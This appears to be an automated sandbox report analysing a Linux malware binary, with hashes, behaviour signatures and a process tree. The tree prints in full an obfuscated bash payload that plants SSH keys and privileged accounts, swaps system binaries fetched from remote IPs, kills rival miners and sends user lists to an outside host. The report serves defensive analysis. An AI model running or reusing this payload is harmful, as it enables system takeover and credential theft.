Resubmissions
02-12-2024 02:52
241202-dcyx7s1lfk 10Analysis
-
max time kernel
140s -
max time network
149s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240729-en -
resource tags
-
submitted
02-12-2024 02:52
General
-
Target
xrx/init0
-
Size
1.0MB
-
MD5
73f9917255a953eb749f5a3c90e3b383
-
SHA1
c8e392cf523aca7e2df62f72d68c83829f0c085d
-
SHA256
c5c11802623d02ba9b1c2c7a52579dbf0c3aa4c87ae6fc85cbfcd71dffffec27
-
SHA512
65b8946b67d42003272690266ccddb59ce715edd16eb6e67e8c3e2b34bb9e092ec736900432efbc1c70777c831742f820b61de8098a6438005641df4f3ddbe46
-
SSDEEP
12288:fbS+JhtEBBYYFkfciIqELZ3OlN6myOP7/i7L95k2rHNq9EnE:fXJ/EBJFkfciIjLZ3Ih/i7LbLNq9
Malware Config
Signatures
-
Adds new SSH keys 1 TTPs 1 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
-
Modifies password files for system users/ groups 1 TTPs 6 IoCs
Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
OS Credential Dumping 1 TTPs 7 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 2 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 10 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks hardware identifiers (DMI) 1 TTPs 2 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Checks mountinfo of local process 1 TTPs 2 IoCs
Checks mountinfo of running processes which indicate if it is running in chroot jail.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Deletes log files 1 TTPs 1 IoCs
Deletes log files on the system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 2 IoCs
-
Reads process memory 1 TTPs 21 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
-
Changes its process name 3 IoCs
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 5 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 5 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Software Deployment Tools 1 TTPs 3 IoCs
Use software deployment tools to execute code.
Processes
-
/tmp/xrx/init0/tmp/xrx/init01⤵
-
/bin/bash/tmp/xrx/init0 -c "exec '/tmp/xrx/init0' \"\$@\"" /tmp/xrx/init01⤵
-
/tmp/xrx/init0/tmp/xrx/init01⤵
-
/bin/bash/tmp/xrx/init0 -c " #!/bin/bash z=\" \";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=\$';LIz='2.1';eCz='Yun';hLz='MR\"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l\"';OCz='|/z';eFz='\$6\$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='\" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s\"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> \$';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' \"\$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\\''';TBz=' /d';fEz='g s';WCz=''\\''\\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\\''\\0';tDz='-ST';rBz='&1 ';BBz=' \"i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x \$';aGz=' sh';tGz='roo';uBz='/nu';HFz='\"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! g';sDz='xrx';oCz='x/u';eGz=' \$H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\\''';kCz='/va';eIz='\$pa';PCz='|/f';mJz='XUh';mKz=' '\\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u \$';aLz=' \"K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' \"r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='\$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='\$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\\''\\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! -';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e \"';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f \$';tBz='dev';fBz=' wr';hJz='i01';WGz='\$(s';pHz='_tm';qCz='ll.';IEz='e \$';LCz='sh\\';EDz='cro';UGz='rho';Fz='m'\\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=\$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\\'' |';pz='omm';Xz='Red';uEz=' \"c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' \$u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o\$K';qJz='wXq';eEz='vin';NEz='ng\"';gLz='! X';DEz='/up';iz='ID ';eHz='\"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\\''';dHz=' /b';mDz='o \"';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='\"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n \"';LEz='er ';ZLz='it0';gIz='le;';ABz='o \$';XCz=''\\'' '\\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d\"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='\" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\\''';YGz=' -u';wEz='tin';gJz='m\$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me\"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='\$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval \"\$Az\$Bz\$Cz\$Dz\$Ez\$Fz\$z\$Gz\$Hz\$Iz\$Jz\$Kz\$Lz\$Mz\$z\$Nz\$Oz\$Pz\$Qz\$Rz\$Sz\$z\$Tz\$Uz\$Vz\$Iz\$Jz\$Wz\$Mz\$z\$Xz\$Iz\$Jz\$Kz\$Yz\$Mz\$z\$Zz\$az\$Iz\$Jz\$Kz\$bz\$Mz\$z\$cz\$dz\$Cz\$Dz\$ez\$Fz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$fz\$oz\$pz\$qz\$rz\$sz\$tz\$uz\$vz\$wz\$xz\$z\$mz\$nz\$z\$yz\$ABz\$Gz\$Hz\$BBz\$CBz\$DBz\$EBz\$FBz\$GBz\$HBz\$IBz\$z\$JBz\$KBz\$LBz\$MBz\$NBz\$OBz\$PBz\$CBz\$DBz\$QBz\$sz\$tz\$RBz\$SBz\$TBz\$UBz\$VBz\$WBz\$z\$XBz\$QBz\$YBz\$ZBz\$aBz\$HBz\$bBz\$cBz\$dBz\$vz\$wz\$xz\$z\$eBz\$z\$fz\$oz\$pz\$qz\$rz\$fBz\$gBz\$hBz\$TBz\$UBz\$VBz\$WBz\$z\$mz\$nz\$z\$yz\$ABz\$Zz\$az\$BBz\$CBz\$DBz\$EBz\$iBz\$jBz\$kBz\$lBz\$z\$JBz\$KBz\$mBz\$CBz\$DBz\$QBz\$iBz\$jBz\$kBz\$nBz\$cBz\$dBz\$vz\$wz\$xz\$z\$XBz\$QBz\$YBz\$ZBz\$aBz\$gBz\$oBz\$pBz\$qBz\$rBz\$sBz\$tBz\$uBz\$vBz\$z\$wBz\$QBz\$YBz\$ZBz\$aBz\$gBz\$oBz\$pBz\$qBz\$rBz\$sBz\$tBz\$uBz\$vBz\$z\$eBz\$z\$eBz\$z\$xBz\$yBz\$ACz\$BCz\$CCz\$DCz\$ECz\$FCz\$GCz\$HCz\$ICz\$JCz\$KCz\$LCz\$MCz\$NCz\$LCz\$OCz\$LCz\$PCz\$QCz\$RCz\$sz\$LBz\$SCz\$TCz\$UCz\$VCz\$WCz\$XCz\$YCz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$yz\$ABz\$cz\$ZCz\$aCz\$bCz\$cCz\$dCz\$eCz\$fCz\$gCz\$z\$hCz\$iCz\$jCz\$kCz\$lCz\$mCz\$nCz\$oCz\$pCz\$ZBz\$qCz\$rCz\$z\$kCz\$lCz\$mCz\$nCz\$oCz\$pCz\$ZBz\$qCz\$sCz\$tCz\$TBz\$UBz\$VBz\$WBz\$z\$uCz\$vCz\$wCz\$xCz\$yCz\$ADz\$BDz\$CDz\$CBz\$DBz\$DDz\$z\$eBz\$z\$EDz\$FDz\$GDz\$HDz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$IDz\$JDz\$KDz\$LDz\$MDz\$NDz\$ODz\$PDz\$z\$uCz\$vCz\$QDz\$RDz\$EDz\$FDz\$SDz\$z\$TDz\$UDz\$CCz\$VDz\$WDz\$XDz\$z\$eBz\$z\$IDz\$JDz\$YDz\$ZDz\$NCz\$IDz\$JDz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$fz\$aDz\$bDz\$cDz\$IDz\$JDz\$YDz\$dDz\$eDz\$fDz\$z\$gDz\$kCz\$lCz\$mCz\$nCz\$hDz\$iDz\$VCz\$jDz\$kDz\$iDz\$lDz\$z\$hCz\$iCz\$jCz\$jDz\$kDz\$iDz\$lDz\$z\$yz\$mDz\$nDz\$oDz\$IDz\$JDz\$gCz\$z\$eBz\$z\$eBz\$z\$pDz\$aBz\$qDz\$rDz\$z\$pDz\$aBz\$qDz\$sDz\$z\$pDz\$aBz\$tDz\$uDz\$vDz\$z\$pDz\$aBz\$tDz\$uDz\$wDz\$z\$pDz\$aBz\$tDz\$uDz\$xDz\$yDz\$z\$IDz\$JDz\$KDz\$AEz\$BEz\$CEz\$DEz\$EEz\$oDz\$tCz\$TBz\$UBz\$VBz\$WBz\$z\$IDz\$JDz\$FEz\$AEz\$BEz\$CEz\$DEz\$EEz\$oDz\$tCz\$TBz\$UBz\$VBz\$WBz\$z\$uCz\$vCz\$AEz\$BEz\$CEz\$DEz\$EEz\$GEz\$z\$yz\$HEz\$IEz\$Az\$JEz\$KEz\$LEz\$ZBz\$MEz\$NEz\$z\$OEz\$PEz\$DDz\$z\$fz\$QEz\$REz\$SEz\$TEz\$UEz\$VEz\$WEz\$XEz\$YEz\$ZEz\$aEz\$bEz\$z\$yz\$HEz\$IEz\$Gz\$Hz\$cEz\$dEz\$eEz\$fEz\$sCz\$gEz\$lBz\$z\$IDz\$JDz\$KDz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$oEz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$IDz\$JDz\$FEz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$oEz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$uCz\$vCz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$oEz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$uCz\$vCz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$qEz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$eBz\$z\$fz\$aDz\$sEz\$hEz\$iEz\$tEz\$eDz\$fDz\$z\$yz\$HEz\$IEz\$Gz\$Hz\$uEz\$vEz\$wEz\$fEz\$sCz\$YDz\$xEz\$yEz\$gCz\$z\$AFz\$BFz\$CFz\$DFz\$z\$eBz\$z\$gDz\$gEz\$hEz\$iEz\$jEz\$kEz\$lEz\$mEz\$nEz\$oEz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$IDz\$JDz\$EFz\$FFz\$SEz\$TEz\$UEz\$VEz\$WEz\$XEz\$YEz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$yz\$HEz\$IEz\$Nz\$GFz\$HFz\$IFz\$JFz\$KFz\$LFz\$MFz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$IDz\$JDz\$KDz\$LDz\$MDz\$NFz\$OFz\$PFz\$z\$IDz\$JDz\$KDz\$LDz\$MDz\$QFz\$RFz\$SFz\$z\$TFz\$UFz\$VFz\$WFz\$YBz\$XFz\$YFz\$ZFz\$z\$aFz\$z\$xBz\$bFz\$cFz\$dFz\$eFz\$fFz\$gFz\$hFz\$iFz\$jFz\$kFz\$lFz\$mFz\$nFz\$oFz\$pFz\$qFz\$rFz\$sFz\$tFz\$uFz\$vFz\$wFz\$xFz\$yFz\$AGz\$BGz\$CGz\$DGz\$EGz\$FGz\$GGz\$HGz\$IGz\$JGz\$KGz\$LGz\$MGz\$NGz\$OGz\$PGz\$VFz\$WFz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$EDz\$FDz\$GDz\$QGz\$xBz\$RGz\$SGz\$TGz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$xBz\$UGz\$VGz\$WGz\$XGz\$YGz\$cDz\$xBz\$RGz\$ZGz\$aGz\$bGz\$cGz\$dGz\$eGz\$fGz\$gGz\$z\$uCz\$vCz\$XFz\$YFz\$hGz\$iGz\$DFz\$jGz\$kGz\$lGz\$mGz\$gEz\$nGz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$gDz\$kCz\$lCz\$mCz\$nCz\$oGz\$JFz\$PGz\$pGz\$qGz\$SEz\$TEz\$UEz\$VEz\$WEz\$XEz\$YEz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$rGz\$sGz\$z\$xBz\$bFz\$cFz\$dFz\$eFz\$fFz\$gFz\$hFz\$iFz\$jFz\$kFz\$lFz\$mFz\$nFz\$oFz\$pFz\$qFz\$rFz\$sFz\$tFz\$uFz\$vFz\$wFz\$xFz\$yFz\$AGz\$BGz\$CGz\$DGz\$EGz\$FGz\$GGz\$HGz\$IGz\$JGz\$KGz\$LGz\$MGz\$NGz\$OGz\$tGz\$uGz\$TBz\$UBz\$VBz\$bBz\$cBz\$z\$IDz\$JDz\$KDz\$vGz\$jDz\$wGz\$ECz\$FCz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$IDz\$JDz\$KDz\$vGz\$xGz\$yGz\$NCz\$AHz\$BHz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$CHz\$jDz\$wGz\$ECz\$FCz\$jDz\$wGz\$ECz\$DHz\$lEz\$EHz\$TBz\$UBz\$VBz\$bBz\$cBz\$z\$CHz\$xGz\$yGz\$NCz\$AHz\$BHz\$AEz\$BEz\$JCz\$QFz\$RFz\$FHz\$GHz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$HHz\$jDz\$IHz\$z\$HBz\$JHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$UHz\$VHz\$WHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$UHz\$FBz\$XHz\$YHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$z\$hCz\$iCz\$ZHz\$aHz\$JCz\$QFz\$RFz\$bHz\$TBz\$UBz\$VBz\$bBz\$cBz\$z\$hCz\$iCz\$cHz\$dHz\$NCz\$AHz\$BHz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$gDz\$jDz\$wGz\$ECz\$FCz\$xGz\$yGz\$NCz\$AHz\$BHz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$yz\$HEz\$IEz\$Nz\$GFz\$eHz\$RFz\$fHz\$gHz\$hHz\$iHz\$gCz\$z\$fz\$aDz\$bDz\$jHz\$JCz\$QFz\$kHz\$lHz\$mHz\$mz\$nz\$z\$HHz\$nHz\$NCz\$z\$HBz\$JHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$oHz\$pHz\$qHz\$rHz\$sHz\$tHz\$uHz\$vHz\$wHz\$xHz\$yHz\$AIz\$BIz\$CIz\$DIz\$QFz\$kHz\$lHz\$EIz\$FIz\$LBz\$GIz\$HIz\$IIz\$JIz\$KIz\$LIz\$MIz\$NIz\$OIz\$PIz\$QIz\$RIz\$z\$hCz\$iCz\$jCz\$nHz\$NCz\$oHz\$pHz\$SIz\$TBz\$UBz\$VBz\$bBz\$cBz\$z\$eBz\$z\$oHz\$TIz\$UIz\$MDz\$QFz\$VIz\$WIz\$XIz\$YIz\$kEz\$z\$fz\$QEz\$ZIz\$oHz\$TIz\$aIz\$eDz\$fDz\$z\$fz\$bIz\$HCz\$cIz\$dIz\$kHz\$lHz\$eIz\$fIz\$gIz\$aEz\$bEz\$z\$yz\$mDz\$UEz\$hIz\$iIz\$jIz\$kIz\$QIz\$lIz\$mIz\$nIz\$oIz\$pIz\$qIz\$rIz\$UEz\$sIz\$tIz\$uIz\$wGz\$QIz\$RIz\$vIz\$wIz\$oHz\$TIz\$sGz\$z\$eBz\$z\$eBz\$z\$xIz\$sGz\$z\$HHz\$kCz\$lCz\$mCz\$nCz\$yIz\$z\$HBz\$JHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$UHz\$VHz\$WHz\$KHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$UHz\$FBz\$XHz\$YHz\$LHz\$MHz\$NHz\$OHz\$PHz\$QHz\$RHz\$SHz\$THz\$AHz\$BHz\$z\$hCz\$iCz\$jCz\$kCz\$lCz\$mCz\$nCz\$AJz\$ECz\$BJz\$z\$CJz\$DJz\$EJz\$FJz\$GJz\$z\$fz\$bIz\$HCz\$cIz\$HJz\$IJz\$CJz\$eDz\$fDz\$z\$yz\$mDz\$JJz\$KJz\$AHz\$BHz\$LJz\$xCz\$yCz\$ADz\$BDz\$AHz\$BHz\$vIz\$MJz\$NJz\$OJz\$PJz\$z\$eBz\$z\$eBz\$z\$fz\$gz\$hz\$iz\$jz\$kz\$lz\$mz\$nz\$z\$xBz\$QJz\$RJz\$SJz\$TJz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$xBz\$bFz\$cFz\$UJz\$VJz\$WJz\$SJz\$TJz\$sBz\$tBz\$uBz\$aBz\$RBz\$pEz\$z\$xBz\$bFz\$cFz\$UJz\$XJz\$YJz\$ZJz\$aJz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$xBz\$bFz\$cFz\$dFz\$eFz\$bJz\$cJz\$dJz\$eJz\$fJz\$gJz\$hJz\$iJz\$jJz\$kJz\$lJz\$mJz\$nJz\$oJz\$pJz\$qJz\$rJz\$sJz\$tJz\$uJz\$vJz\$wJz\$xJz\$yJz\$AKz\$BKz\$CKz\$DKz\$EKz\$FKz\$GKz\$HKz\$IKz\$JKz\$OGz\$ZJz\$aJz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$CHz\$kCz\$lCz\$mCz\$nCz\$oGz\$JFz\$KKz\$LKz\$ZJz\$aJz\$SEz\$TEz\$UEz\$VEz\$WEz\$XEz\$YEz\$dBz\$vz\$wz\$xz\$qBz\$rEz\$z\$eBz\$z\$fz\$MKz\$NKz\$OKz\$PKz\$QKz\$RKz\$SKz\$eDz\$fDz\$z\$yz\$HEz\$IEz\$Xz\$uEz\$vEz\$wEz\$TKz\$UKz\$YDz\$xEz\$yEz\$gCz\$z\$AFz\$BFz\$kCz\$lCz\$mCz\$VKz\$z\$eBz\$z\$fz\$aDz\$bDz\$wCz\$xCz\$yCz\$ADz\$WKz\$HBz\$aIz\$eDz\$fDz\$z\$CHz\$kCz\$lCz\$mCz\$nCz\$XKz\$YKz\$ZKz\$kCz\$lCz\$mCz\$aKz\$bKz\$cKz\$z\$hCz\$iCz\$jCz\$kCz\$lCz\$mCz\$aKz\$bKz\$cKz\$z\$eBz\$z\$kCz\$lCz\$mCz\$aKz\$bKz\$cKz\$dKz\$tBz\$uBz\$aBz\$eKz\$tBz\$uBz\$aBz\$fKz\$gKz\$hKz\$iKz\$jKz\$z\$xBz\$kKz\$lKz\$ACz\$BCz\$CCz\$DCz\$ECz\$FCz\$GCz\$HCz\$ICz\$JCz\$KCz\$LCz\$MCz\$NCz\$LCz\$OCz\$LCz\$PCz\$QCz\$RCz\$sz\$LBz\$SCz\$TCz\$UCz\$VCz\$WCz\$XCz\$mKz\$nKz\$oKz\$pKz\$z\$HBz\$JHz\$qKz\$HIz\$IIz\$rKz\$sKz\$tKz\$uKz\$vKz\$wKz\$xKz\$YFz\$yKz\$YFz\$ALz\$BLz\$xBz\$kKz\$CLz\$EIz\$DLz\$ELz\$uHz\$vHz\$wHz\$FLz\$GLz\$HLz\$ILz\$JLz\$KLz\$xGz\$LLz\$MLz\$NLz\$OLz\$PLz\$YFz\$QLz\$RLz\$z\$SLz\$TLz\$ULz\$GJz\$z\$uCz\$vCz\$hEz\$EJz\$VLz\$SLz\$TLz\$WLz\$z\$uCz\$vCz\$wCz\$xCz\$yCz\$ADz\$BDz\$XLz\$YLz\$z\$uCz\$vCz\$YBz\$ZLz\$z\$yz\$HEz\$IEz\$Zz\$az\$aLz\$bLz\$cLz\$dLz\$eLz\$fLz\$gLz\$hLz\$z\$yz\$HEz\$IEz\$Tz\$Uz\$Vz\"" /tmp/xrx/init01⤵
-
/usr/bin/apt-getapt-get install -y msr-tools2⤵
- Deletes log files
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/bin/ischroot/usr/bin/ischroot -t3⤵
- Checks mountinfo of local process
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/bin/sh/bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"3⤵
-
/usr/sbin/dpkg-preconfigure/usr/sbin/dpkg-preconfigure --apt4⤵
- OS Credential Dumping
-
/usr/local/sbin/localelocale charmap5⤵
-
-
/usr/local/bin/localelocale charmap5⤵
-
-
/usr/sbin/localelocale charmap5⤵
-
-
/usr/bin/localelocale charmap5⤵
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-multi-arch3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-protected-field3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 40 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb3⤵
- Write file to user bin folder
-
/usr/sbin/shsh -c -- "(test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)"4⤵
-
-
/usr/bin/shsh -c -- "(test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)"4⤵
-
/usr/lib/needrestart/dpkg-status/usr/lib/needrestart/dpkg-status5⤵
-
/usr/bin/mkdirmkdir -p /run/needrestart6⤵
-
-
/usr/bin/touchtouch /run/needrestart/unpacked6⤵
-
-
-
-
/usr/sbin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb4⤵
-
-
/usr/bin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb4⤵
- Software Deployment Tools
-
-
/usr/sbin/dpkg-debdpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci4⤵
